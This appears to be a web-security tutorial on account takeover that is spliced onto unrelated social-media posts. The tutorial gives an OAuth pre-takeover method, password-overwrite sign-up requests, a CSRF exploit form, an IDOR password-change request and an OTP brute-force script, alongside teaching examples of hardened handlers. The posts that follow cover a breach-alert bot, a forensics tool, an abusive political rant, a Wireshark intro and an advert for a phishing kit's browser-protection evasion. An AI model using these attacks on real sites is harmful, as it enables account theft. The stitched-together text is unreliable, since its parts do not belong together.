# Account Takeover
## **Introduction**
Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
## **How to Find**
1. Using OAuth misconfiguration (pre-account takeover)
- Victim has an account on https://t.co/jQ2v94Cr3I
- Attacker creates an account on https://t.co/jQ2v94Cr3I using OAuth. For example, the attacker has a Facebook account registered with the victim's email.
- Attacker changes his/her email to the victim's email.
- When the victim tries to create an account on https://t.co/jQ2v94Cr3I, it says the email already exists.
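The misconfiguration behind this step is an OAuth callback that links or creates the local account from the e-mail claim alone. The added example below (not code from the original post) models that callback next to a hardened one that refuses to link an unlinked identity to an existing account and refuses to create an account under an unverified address; the `Account`/`OAuthLogin` names, the claim shape (`sub`, `email`, `email_verified`) and the sample data are assumptions.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Set


@dataclass
class Account:
    email: str
    has_password: bool
    idp_subjects: Set[str] = field(default_factory=set)  # linked OAuth identities


class OAuthLogin:
    """Local accounts keyed by e-mail, plus two versions of the OAuth callback."""

    def __init__(self) -> None:
        self.accounts: Dict[str, Account] = {}

    def register_local(self, email: str) -> bool:
        """Normal e-mail/password sign-up; False means 'email already exists'."""
        key = email.lower()
        if key in self.accounts:
            return False
        self.accounts[key] = Account(key, has_password=True)
        return True

    def callback_vulnerable(self, claims: Dict[str, object]) -> Optional[str]:
        """Trusts the IdP e-mail claim: an IdP identity that carries the
        victim's address is linked to, or creates, the victim's account."""
        email = str(claims["email"]).lower()
        acct = self.accounts.get(email)
        if acct is None:
            acct = Account(email, has_password=False)
            self.accounts[email] = acct
        acct.idp_subjects.add(str(claims["sub"]))
        return email  # the session now belongs to this account

    def callback_hardened(self, claims: Dict[str, object]) -> Optional[str]:
        email = str(claims["email"]).lower()
        sub = str(claims["sub"])
        acct = self.accounts.get(email)
        if acct is not None and sub not in acct.idp_subjects:
            # Existing account never linked to this IdP identity: do not link on
            # an e-mail match. Sign in with the local password first and link
            # explicitly from the account settings.
            return None
        if acct is None:
            if not claims.get("email_verified", False):
                return None  # unverified address: create nothing under it
            acct = Account(email, has_password=False)
            self.accounts[email] = acct
        acct.idp_subjects.add(sub)
        return email


# Constructed sample data: the attacker's IdP identity bearing the victim's address.
VICTIM = "victim@example.com"
ATTACKER_CLAIMS = {"sub": "idp:attacker", "email": VICTIM, "email_verified": False}


def demo() -> Dict[str, object]:
    r: Dict[str, object] = {}
    # Case 1: the victim already has an account and the attacker arrives via OAuth.
    v = OAuthLogin()
    v.register_local(VICTIM)
    r["vuln_takeover"] = v.callback_vulnerable(ATTACKER_CLAIMS)  # victim's account
    h = OAuthLogin()
    h.register_local(VICTIM)
    r["hard_takeover"] = h.callback_hardened(ATTACKER_CLAIMS)    # refused
    # Case 2 (pre-account takeover): the attacker arrives first, the victim later.
    v = OAuthLogin()
    v.callback_vulnerable(ATTACKER_CLAIMS)
    r["vuln_victim_signup"] = v.register_local(VICTIM)           # "email already exists"
    h = OAuthLogin()
    h.callback_hardened(ATTACKER_CLAIMS)
    r["hard_victim_signup"] = h.register_local(VICTIM)           # victim signs up normally
    return r


if __name__ == "__main__":
    print(demo())
```

When testing a target, the question to answer is whether the callback keys on the e-mail claim at all: register an IdP identity whose address you control, change that address to one already registered on the target, and see whether the callback lands in the existing account or creates one that blocks the legitimate owner's sign-up.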
2. Try re-signing up using the same email
```
POST /newaccount
[...]
email=<victim email>&password=1234
```
After signing up with the victim's email, sign up again with the same email but a different password. If the second request is accepted and the stored password is replaced instead of the request being rejected, the attacker can log in to the victim's account with the new password.
```
POST /newaccount
[...]
email=<victim email>&password=hacked
```
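The bug behind this step is a sign-up handler that upserts the user record. The added example below (not code from the original post) models that `/newaccount` handler next to a hardened one that never touches an existing record; the in-memory store, class and function names, and the sample e-mail are assumptions.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

PBKDF2_ROUNDS = 50_000  # kept low so the demo runs quickly; use more in production


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, PBKDF2-SHA256 digest) for a password."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class VulnerableAccounts:
    """Sign-up that upserts: a second /newaccount with an existing e-mail
    silently replaces the stored password (the bug described above)."""

    def __init__(self) -> None:
        self.users: Dict[str, Tuple[bytes, bytes]] = {}

    def newaccount(self, email: str, password: str) -> str:
        self.users[email.lower()] = hash_password(password)  # overwrite, no check
        return "account created"

    def login(self, email: str, password: str) -> bool:
        record = self.users.get(email.lower())
        if record is None:
            return False
        salt, digest = record
        return hmac.compare_digest(hash_password(password, salt)[1], digest)


class HardenedAccounts(VulnerableAccounts):
    """Sign-up that never modifies an existing record. The reply is the same
    in both branches so the endpoint is not an e-mail enumeration oracle; in a
    real app the new record would also stay unusable until the address is
    verified by mail."""

    def newaccount(self, email: str, password: str) -> str:
        key = email.lower()
        if key not in self.users:
            self.users[key] = hash_password(password)
        return "check your inbox to verify the address"


def demo() -> Dict[str, bool]:
    """Constructed scenario: victim signs up with 1234, attacker re-signs up with 'hacked'."""
    results: Dict[str, bool] = {}
    for name, store in (("vulnerable", VulnerableAccounts()), ("hardened", HardenedAccounts())):
        store.newaccount("victim@example.com", "1234")    # victim's original sign-up
        store.newaccount("victim@example.com", "hacked")  # attacker's re-sign-up
        results[f"{name}_attacker_login"] = store.login("victim@example.com", "hacked")
        results[f"{name}_victim_login"] = store.login("victim@example.com", "1234")
    return results


if __name__ == "__main__":
    print(demo())
```

The tell-tale sign during testing is not only that the second sign-up succeeds but that the original password stops working afterwards; check both.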
3. Via CSRF
- Create an account as the attacker, fill in the whole form, and check your info in the Account Details.
- Change the email and capture the request, then build a CSRF exploit from it.
- The CSRF exploit looks like the one below. I replaced the email value with anyemail@*******.com and submitted the request in the victim's account.
```html
<html>
<body>
<form action="https://t.co/5nay6rLSjI" method="POST">
<!-- the parameter name "email" is assumed; use the name from the captured request -->
<input type="hidden" name="email" value="anyemail@*******.com"/>
<input type="submit" value="Submit Request">
</form>
</body>
</html>
```
4. Chaining with IDOR, for example
```
POST /changepassword.php
Host: https://t.co/rGXgqk7w19
[...]
userid=500&password=hacked123
```
500 is the attacker's ID and 501 is the victim's ID, so change the userid from the attacker's ID to the victim's.
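Steps 3 and 4 are two missing checks on the same kind of state-changing endpoint, so one added example serves both (it is not code from the original post): a model of `POST /changepassword.php` that takes the target `userid` from the body and accepts any request carrying a session cookie, next to a hardened version that derives the account from the session and requires a per-session CSRF token. The `Request`/`PasswordService` names, the session and token handling, and the sample user IDs are assumptions.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict


@dataclass
class Request:
    """Minimal stand-in for the browser's POST /changepassword.php request."""
    cookies: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


class PasswordService:
    def __init__(self) -> None:
        # Constructed sample data: userid 500 is the attacker, 501 the victim.
        self.passwords: Dict[int, str] = {500: "attacker-pw", 501: "victim-pw"}
        self.sessions: Dict[str, int] = {}      # session cookie -> userid
        self.csrf_tokens: Dict[str, str] = {}   # session cookie -> token

    def login(self, userid: int) -> str:
        sid = secrets.token_hex(16)
        self.sessions[sid] = userid
        self.csrf_tokens[sid] = secrets.token_hex(16)
        return sid

    def csrf_token_for(self, sid: str) -> str:
        return self.csrf_tokens[sid]

    def change_password_vulnerable(self, req: Request) -> int:
        """IDOR: the target account comes from the form. CSRF: any request with
        a valid session cookie is accepted, including one a cross-site form
        submits from the victim's browser."""
        if req.cookies.get("session") not in self.sessions:
            return 401
        self.passwords[int(req.form["userid"])] = req.form["password"]
        return 200

    def change_password_hardened(self, req: Request) -> int:
        sid = req.cookies.get("session")
        if sid is None or sid not in self.sessions:
            return 401
        # CSRF: require the per-session token, which a cross-site page cannot read.
        if not secrets.compare_digest(req.form.get("csrf_token", ""), self.csrf_tokens[sid]):
            return 403
        # IDOR: the account is derived from the session, never from the body.
        uid = self.sessions[sid]
        if "userid" in req.form and int(req.form["userid"]) != uid:
            return 403
        self.passwords[uid] = req.form["password"]
        return 200


def demo() -> Dict[str, object]:
    results: Dict[str, object] = {}

    # Vulnerable handler, IDOR: attacker's own session, victim's userid in the body.
    svc = PasswordService()
    attacker_sid = svc.login(500)
    idor = Request({"session": attacker_sid}, {"userid": "501", "password": "hacked123"})
    results["vuln_idor_status"] = svc.change_password_vulnerable(idor)
    results["vuln_idor_victim_pw"] = svc.passwords[501]

    # Vulnerable handler, CSRF: the victim's browser posts the attacker's form
    # with the victim's cookie attached; no token is needed.
    svc = PasswordService()
    victim_sid = svc.login(501)
    csrf = Request({"session": victim_sid}, {"userid": "501", "password": "hacked123"})
    results["vuln_csrf_status"] = svc.change_password_vulnerable(csrf)

    # Hardened handler: both requests are rejected; a legitimate request that
    # carries the session's own token still works.
    svc = PasswordService()
    attacker_sid, victim_sid = svc.login(500), svc.login(501)
    idor = Request({"session": attacker_sid},
                   {"userid": "501", "password": "hacked123",
                    "csrf_token": svc.csrf_token_for(attacker_sid)})
    results["hard_idor_status"] = svc.change_password_hardened(idor)
    csrf = Request({"session": victim_sid}, {"userid": "501", "password": "hacked123"})
    results["hard_csrf_status"] = svc.change_password_hardened(csrf)
    legit = Request({"session": victim_sid},
                    {"password": "new-victim-pw", "csrf_token": svc.csrf_token_for(victim_sid)})
    results["hard_legit_status"] = svc.change_password_hardened(legit)
    results["hard_victim_pw"] = svc.passwords[501]
    return results


if __name__ == "__main__":
    print(demo())
```

A password-change endpoint should additionally require the current password, and `SameSite` cookies plus an `Origin` check are worthwhile defence in depth against the CSRF half; neither replaces the token and session checks above.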
5. No rate limit on 2FA: if the endpoint that verifies the OTP does not throttle or lock the challenge after failed attempts, a 6-digit code can be brute-forced in at most 1,000,000 requests.
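The added example below (not code from the original post) shows what the missing limit means in practice: an OTP verifier that accepts unlimited guesses is recovered by enumerating every 6-digit code, while one that locks the challenge after a few failures stops the same loop. The `OtpVerifier`/`brute_force` names, the attempt limit and the sample code are assumptions.

```python
import hmac
from typing import Optional


class OtpVerifier:
    """One 2FA challenge. With max_attempts=None the endpoint never throttles
    (the weakness above); with a limit it locks after that many failures."""

    def __init__(self, code: str, max_attempts: Optional[int] = None) -> None:
        self._code = code
        self.max_attempts = max_attempts
        self.attempts = 0
        self.locked = False

    def verify(self, guess: str) -> bool:
        if self.locked:
            return False
        self.attempts += 1
        if hmac.compare_digest(guess.encode(), self._code.encode()):
            return True
        if self.max_attempts is not None and self.attempts >= self.max_attempts:
            self.locked = True  # further guesses are refused, even the right one
        return False


def brute_force(verifier: OtpVerifier) -> Optional[str]:
    """Replay the 2FA POST with every 6-digit code until one is accepted or the
    challenge locks. Returns the recovered code, or None."""
    for n in range(10 ** 6):
        guess = f"{n:06d}"
        if verifier.verify(guess):
            return guess
        if verifier.locked:
            return None
    return None


# Constructed sample code; a real one comes from the TOTP or SMS generator.
SAMPLE_CODE = "048213"


def demo() -> dict:
    unlimited = OtpVerifier(SAMPLE_CODE)                 # no rate limit
    limited = OtpVerifier(SAMPLE_CODE, max_attempts=5)   # locks after 5 failures
    return {
        "unlimited_recovered": brute_force(unlimited),
        "unlimited_attempts": unlimited.attempts,
        "limited_recovered": brute_force(limited),
        "limited_attempts": limited.attempts,
    }


if __name__ == "__main__":
    print(demo())
```

Real codes also expire after a short window, so a lockout combined with expiry bounds the attack. When testing, check where the limit is enforced: a counter tied only to the session or the client IP is bypassed by starting a new session or rotating addresses, whereas one tied to the user or the challenge itself is not.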
References:
- [Pre-Account Takeover using OAuth Misconfiguration](https://t.co/3FCaRR1sbg)
- [Account Takeover via CSRF](https://t.co/OSAu7tbrN2)
- [How re-signing up for an account lead to account takeover](https://t.co/vxhiLdCqsT)
🚨 New cyber-intelligence bot in Mexico
The DataBreachMX system has just been linked to the Telegram bot LeaksIntelMX_bot.
What it does:
1. Automatically notifies you of vulnerabilities, defacements and leaks in Mexico.
2. Keeps a historical record of incidents in Databreachmx and, if earlier information is found, sends it to you.
Goal: help organizations and users find out whether they have been affected and stay up to date with digital security in Mexico.
🇲🇽 Mexico only |
📢 Automatic real-time notifications
➡️ Join the bot, just press START and receive alerts directly in Telegram!
Bot LeaksIntelMX:
https://t.co/y0z4GA4Xlm
Site:
https://t.co/V0qyEcJltj
🛠️ Forensic-Timeliner - Windows Forensic Tool for DFIR Investigators
Read more: https://t.co/6NcU0U6KSV
Forensic-Timeliner, a Windows forensic tool for DFIR investigators, has released version 2.2, which offers enhanced automation and improved artifact support for digital forensics and incident response operations.
This high-speed processing engine consolidates CSV output from leading triage utilities into a unified timeline, empowering analysts to reconstruct event sequences and identify key indicators of compromise rapidly.
The engine applies YAML-driven filters defined in config/keywords/keywords.yaml, automatically detecting files by name, folder, or header patterns.
#cybersecuritynews #DFIR #Windows
Good morning.
This is what I think of any of the candidates in the #Primarias2025
One "apruebo" who covered up for a rapist, the other a communist just like Hertz and worse, the October-2019 airhead and the other one don't exist
Don't vote if you're not a leftist piece of sh… Don't vote
Wireshark: A Beginner’s Guide 🦈
What is Wireshark?
Wireshark is the world's most popular network protocol analyzer, used to capture, inspect, and troubleshoot network traffic in real time. It's a must-have tool for network admins, pentesters, and cybersecurity pros.
🧵🧵
‼️ Evilginx Pro 4.1 - Google Safe Browsing evasion 🛡️
I've just uploaded a short demo video demonstrating how Evilginx Pro is able to evade Enhanced protection in Google Chrome browser.
The update is coming soon!
🔗 https://t.co/WtJb00SBrS